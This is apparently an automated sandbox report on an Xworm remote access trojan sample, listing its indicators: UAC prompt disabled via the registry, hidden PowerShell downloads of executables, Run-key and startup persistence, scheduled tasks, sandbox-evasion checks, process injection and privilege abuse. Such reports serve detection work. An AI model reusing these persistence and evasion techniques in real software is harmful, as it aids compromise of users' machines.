xworm | 8b095c70bb18e878b288db10c7b9d5de9ed2df22f075b30ed0cbf3fdcb2c9342

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConSENtprOmPTbEHAViorAdMIN = "0"	powershell.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	848	powershell.exe
18	848	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
848	powershell.exe
4292	powershell.exe
2240	powershell.exe
4920	powershell.exe
2480	powershell.exe
3184	powershell.exe
3920	powershell.exe
4580	powershell.exe
1244	powershell.exe
4736	powershell.EXE

Downloads MZ/PE file 2 IoCs

flow	pid	Process
8	848	powershell.exe
18	848	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000\Control Panel\International\Geo\Nation	svOrbEl0.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk	svOrbEl0.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk	svOrbEl0.exe

Executes dropped EXE 6 IoCs

pid	Process
2260	FMyUS.eXe
2344	VjhvVGIe.exe
2548	svOrbEl0.exe
1888	1ZRs6.EXe
4028	svOrbEl0.exe
2704	svOrbEl0.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svOrbEl0 = "C:\\Users\\Admin\\AppData\\Roaming\\svOrbEl0.exe"	svOrbEl0.exe

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\svOrbEl0	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4736 set thread context of 4668	4736	powershell.EXE	108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1ZRs6.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FMyUS.eXe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\001880114EC2CA49 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004d82166d62faae498d5d8dc686151b67000000000200000000001066000000010000200000004fa0abc678d845e4fc157d0915d1258b93ff95ff8637b20f3b08aa7a3bb09493000000000e80000000020000200000005ec20ab0aee67fd3dc444884a969e6b9a1b8abe2b25e1d97035814bc25e8bd518000000068ea59aff548ffc67ff44d309b7e6d41b4ba59c40711a0bdb319e032a257b6d68551d8dca96820143664f674858be893f54f3cf913d0f58fa79aad91ec163dec623bab456921bed9d731366a6530c4d46d03b09775ca68d6a1237652b7d2107ceacc918352ca5d964a6614e770d6e685c0ae3945e5c34325619d85c0dbc0d48c4000000016c0cc16a0a61727b2c088e20736771e004b2eca081202d5de83566a62ebcae356c49aa19a0149329d67a02819878f4e79fe799663999ebf5d25c76124af32f0	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001880114EC2CA49"	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1740872622"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 01 Mar 2025 23:43:43 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004d82166d62faae498d5d8dc686151b670000000002000000000010660000000100002000000069bc562d3b76062863540ca339beb88a4ca2d432021460cf9091a0100e097341000000000e8000000002000020000000982161cb28b80d8e5e14f7e01b72d8fcba4293a24e62a11f1eb01e8005d0765a10060000d54616440eb74ee41371e33dde7bba15b781900736962d40743bae9df4fe6c7d685356170bc09b67ee5cbaa1f5471b2adf18cf3f619487ea69a739fe77d068ab17fe3ef396664025f4e44c2ef3f890ea2801e7ad7e6b3aca95c9c7b56de6565ed49b11ffe7f82efe519ca6b9e146681c4e91a29e388b417e32eae8ad928caf4c24f33f22f21250f3a96deb43cc83e656ae2a00e29e545d213191f9c5e5524fbdf3ac1c72f8638db7a53a135533b82f0b2fd196ee0cffca8e259bd3d29593914d3abf0df916579d7f74c888a42c2d98665cb5473259088b4364fd8817714ec2edcd02bebc170c852d5a2b6910693f8e1a90f1794590e4d70429e18edb3d98a960aa3672c761c16a64fd59ae834f5a83b6416b3e978da52037bc7403fe8971c95b14679bab2df51b8d5b4851a15efc40dd3a8ca16b1bb17bef25b889169c68841d476140e55beaedb075170d4392ba9a5ddf0cab087b64dc7b897c84fd37b12cf5b696db60d54a5165ef2cfed2393b682f4733ff953bf947a3d6890bb22ea6f124d7c76a74728195a38b499d34d4a0e7fd2d091ead186ade694e60a7c117c1c1ecc913128948c62ea5868e178c8c4703e808e435101ee2dce4b156aa097fe23d9b6323e4abc2c38c0a91317bebf2d478a82a3101789d1846b490d676ceff2f0e3a6f7fc88d4c678a8427a3cbd4557ba367f102826828479f2df0588a134764106fac70df91c29b4089d20892e9bf98e5433fbdfe53db0d0fe8efac4fefcdd916187bf76355fb113ec45a316c3d2245a768f98de7d8c758dbd9a39f55bf12611413b55108c8f2c0428dc0c4feebc7f88b598de34b1097de8f95d4e317b1c3236f23d9c23d48592e95cae57990bd05e63f76f91f20bd004ebfd903e90550c284959850756db44afd0483a96a071fe1b736fa82613b2b20657d84e4841e02237dda0f8dda2b7cb2128c4e653f58f155d085f1f25387a3d22435327394a8ea5458b7e89cb8aa584fc8703557e2054072009e615c9736244b61e372d23dd986ed17b343b49e43fee9e4ae972c303cc657278983029e6f80e68380e1b761382801269ee14448ac7343a217d808d4ff8bc2dd79e0642422e9d25d2dbdd5d06995a0f94c60bec736c4fbe880c8efe88533da094b833fdd6c1c218f7ef527be34fb6e28ded826bc6825d964659f629c3520bdeb7d2afbd1c317eb23d2b45d0cce867bdc26ada6e27ce98e3aad092cc880fc82c0ac80f5cb2e764a0c85c769feb1c7c2435a7696137ebe3318de60569a315cfb5e4594ccad32eb556bc09af3ad43eb7ec56c58ee1dd2d921722cc45fe860221a9a5b0c397259a322094d6566f7ecca588077722af95413fe9d227ebe1001dec01a2449ea128bb26e8663dd74513bae27679ae62d539dab4bdecc851f7f6529b461a7248f8e8b434f09dcc9072dd1dcdab39c8a5067f23ebf674cd204a4e4b5582d420fab119240b4224ced50a0d85015e0e77fb9b0ad201ec81d48f65ae80a8eb678da40bca59683151265eafb60fa3c272ef9a397b4026854fd6ebde34591955a8a397818f7da420cbc68d8876af58deb0f5d06af4ff13173b1c1d17c4939af8e98c05db2bde717f58b6c2550f93d72dccd7c806bfb4a1820d24bc8fcfd48e540e759a3a4890a3d355a246857636d4e3e5c45090e511ee46c6a5c6bce9166f4e638ca54e2e9fb8fe2bf0d1fbed896fee99bc5afe85756ec4880232ad3b38f7175cf0ef821696783a2381ec3e86adf93578377d8c3ac4435ac105e79103c3511d4f2e9e8759525084d4dc7ff7fdf413ef4327896e6c6b36a30c677bc756931e6a48a37c7ec4747f762138a23e4e3e83f7e5e39ea5d1b41ab0bd950c79b1d910652080ebff0a852f331ef799f156979e9d5c6b6a6d5731993304bea2aab26c8dc8106e7cadf257336a129fb29cbf2265c07886eb9b0d15c7abbd04ecb16ceebdd7716a2f246738c871dc850390b66df78597a730b7ee1abffbe16e63592172a81199a58dfbc3a8201b7effd4635bfadbc288c158ae8dc1b6bb4798366bd2f044b19cf9fa4290e7d2b0c22b88d14ce5aa0b5ae2751c5a1a80cd9d85a468aaf0b20cdc196b7ef0b51f9f6af831434900cc84fe8e2853ed3268e7a7388df3974f5190828bb67d2e8e5e86cd48880408692f3b589f5474a97c2af1e3418b72cab7106651542400000002eddf9c758f568d50dbc29256c40894027dd4ff6c66dd5cd42a4815dbdd4d005322044b3e85045f1f958898b750d1d8523cc85b9eb6a6ae87581e74623b71e62	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E10369F7-CB22-4E8E-917F-FDC37A4E0C57}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1428	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
848	powershell.exe
848	powershell.exe
4580	powershell.exe
4580	powershell.exe
2260	FMyUS.eXe
2260	FMyUS.eXe
2260	FMyUS.eXe
2260	FMyUS.eXe
2344	VjhvVGIe.exe
2344	VjhvVGIe.exe
2344	VjhvVGIe.exe
2344	VjhvVGIe.exe
4736	powershell.EXE
4736	powershell.EXE
4736	powershell.EXE
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4292	powershell.exe
4292	powershell.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4292	powershell.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
2240	powershell.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
2240	powershell.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4920	powershell.exe
2240	powershell.exe
4668	dllhost.exe
4668	dllhost.exe
4920	powershell.exe
4668	dllhost.exe
4668	dllhost.exe
2480	powershell.exe
4668	dllhost.exe
4668	dllhost.exe
2480	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	2260	FMyUS.eXe
Token: SeDebugPrivilege	2344	VjhvVGIe.exe
Token: SeIncreaseQuotaPrivilege	4580	powershell.exe
Token: SeSecurityPrivilege	4580	powershell.exe
Token: SeTakeOwnershipPrivilege	4580	powershell.exe
Token: SeLoadDriverPrivilege	4580	powershell.exe
Token: SeSystemProfilePrivilege	4580	powershell.exe
Token: SeSystemtimePrivilege	4580	powershell.exe
Token: SeProfSingleProcessPrivilege	4580	powershell.exe
Token: SeIncBasePriorityPrivilege	4580	powershell.exe
Token: SeCreatePagefilePrivilege	4580	powershell.exe
Token: SeBackupPrivilege	4580	powershell.exe
Token: SeRestorePrivilege	4580	powershell.exe
Token: SeShutdownPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeSystemEnvironmentPrivilege	4580	powershell.exe
Token: SeRemoteShutdownPrivilege	4580	powershell.exe
Token: SeUndockPrivilege	4580	powershell.exe
Token: SeManageVolumePrivilege	4580	powershell.exe
Token: 33	4580	powershell.exe
Token: 34	4580	powershell.exe
Token: 35	4580	powershell.exe
Token: 36	4580	powershell.exe
Token: SeDebugPrivilege	2548	svOrbEl0.exe
Token: SeDebugPrivilege	4736	powershell.EXE
Token: SeDebugPrivilege	4736	powershell.EXE
Token: SeDebugPrivilege	4668	dllhost.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeIncreaseQuotaPrivilege	4292	powershell.exe
Token: SeSecurityPrivilege	4292	powershell.exe
Token: SeTakeOwnershipPrivilege	4292	powershell.exe
Token: SeLoadDriverPrivilege	4292	powershell.exe
Token: SeSystemProfilePrivilege	4292	powershell.exe
Token: SeSystemtimePrivilege	4292	powershell.exe
Token: SeProfSingleProcessPrivilege	4292	powershell.exe
Token: SeIncBasePriorityPrivilege	4292	powershell.exe
Token: SeCreatePagefilePrivilege	4292	powershell.exe
Token: SeBackupPrivilege	4292	powershell.exe
Token: SeRestorePrivilege	4292	powershell.exe
Token: SeShutdownPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeSystemEnvironmentPrivilege	4292	powershell.exe
Token: SeRemoteShutdownPrivilege	4292	powershell.exe
Token: SeUndockPrivilege	4292	powershell.exe
Token: SeManageVolumePrivilege	4292	powershell.exe
Token: 33	4292	powershell.exe
Token: 34	4292	powershell.exe
Token: 35	4292	powershell.exe
Token: 36	4292	powershell.exe
Token: SeShutdownPrivilege	3556	Explorer.EXE
Token: SeCreatePagefilePrivilege	3556	Explorer.EXE
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeIncreaseQuotaPrivilege	2240	powershell.exe
Token: SeSecurityPrivilege	2240	powershell.exe
Token: SeTakeOwnershipPrivilege	2240	powershell.exe
Token: SeLoadDriverPrivilege	2240	powershell.exe
Token: SeSystemProfilePrivilege	2240	powershell.exe
Token: SeSystemtimePrivilege	2240	powershell.exe
Token: SeProfSingleProcessPrivilege	2240	powershell.exe
Token: SeIncBasePriorityPrivilege	2240	powershell.exe
Token: SeCreatePagefilePrivilege	2240	powershell.exe
Token: SeBackupPrivilege	2240	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3708 wrote to memory of 1928	3708	cmd.exe	85
PID 3708 wrote to memory of 1928	3708	cmd.exe	85
PID 3708 wrote to memory of 824	3708	cmd.exe	86
PID 3708 wrote to memory of 824	3708	cmd.exe	86
PID 3708 wrote to memory of 2964	3708	cmd.exe	87
PID 3708 wrote to memory of 2964	3708	cmd.exe	87
PID 3708 wrote to memory of 2304	3708	cmd.exe	88
PID 3708 wrote to memory of 2304	3708	cmd.exe	88
PID 3708 wrote to memory of 4832	3708	cmd.exe	89
PID 3708 wrote to memory of 4832	3708	cmd.exe	89
PID 3708 wrote to memory of 2552	3708	cmd.exe	90
PID 3708 wrote to memory of 2552	3708	cmd.exe	90
PID 3708 wrote to memory of 3572	3708	cmd.exe	91
PID 3708 wrote to memory of 3572	3708	cmd.exe	91
PID 3708 wrote to memory of 1484	3708	cmd.exe	92
PID 3708 wrote to memory of 1484	3708	cmd.exe	92
PID 3708 wrote to memory of 3780	3708	cmd.exe	93
PID 3708 wrote to memory of 3780	3708	cmd.exe	93
PID 3708 wrote to memory of 848	3708	cmd.exe	94
PID 3708 wrote to memory of 848	3708	cmd.exe	94
PID 848 wrote to memory of 4580	848	powershell.exe	95
PID 848 wrote to memory of 4580	848	powershell.exe	95
PID 848 wrote to memory of 2260	848	powershell.exe	97
PID 848 wrote to memory of 2260	848	powershell.exe	97
PID 848 wrote to memory of 2260	848	powershell.exe	97
PID 2260 wrote to memory of 2344	2260	FMyUS.eXe	98
PID 2260 wrote to memory of 2344	2260	FMyUS.eXe	98
PID 848 wrote to memory of 2548	848	powershell.exe	100
PID 848 wrote to memory of 2548	848	powershell.exe	100
PID 848 wrote to memory of 1888	848	powershell.exe	103
PID 848 wrote to memory of 1888	848	powershell.exe	103
PID 848 wrote to memory of 1888	848	powershell.exe	103
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4736 wrote to memory of 4668	4736	powershell.EXE	108
PID 4668 wrote to memory of 628	4668	dllhost.exe	5
PID 4668 wrote to memory of 676	4668	dllhost.exe	7
PID 4668 wrote to memory of 980	4668	dllhost.exe	12
PID 4668 wrote to memory of 388	4668	dllhost.exe	13
PID 4668 wrote to memory of 412	4668	dllhost.exe	14
PID 4668 wrote to memory of 456	4668	dllhost.exe	15
PID 4668 wrote to memory of 888	4668	dllhost.exe	16
PID 4668 wrote to memory of 1028	4668	dllhost.exe	17
PID 4668 wrote to memory of 1108	4668	dllhost.exe	18
PID 4668 wrote to memory of 1144	4668	dllhost.exe	19
PID 4668 wrote to memory of 1196	4668	dllhost.exe	20
PID 4668 wrote to memory of 1304	4668	dllhost.exe	22
PID 4668 wrote to memory of 1320	4668	dllhost.exe	23
PID 4668 wrote to memory of 1364	4668	dllhost.exe	24
PID 4668 wrote to memory of 1416	4668	dllhost.exe	25
PID 4668 wrote to memory of 1436	4668	dllhost.exe	26
PID 4668 wrote to memory of 1516	4668	dllhost.exe	27
PID 4668 wrote to memory of 1612	4668	dllhost.exe	28
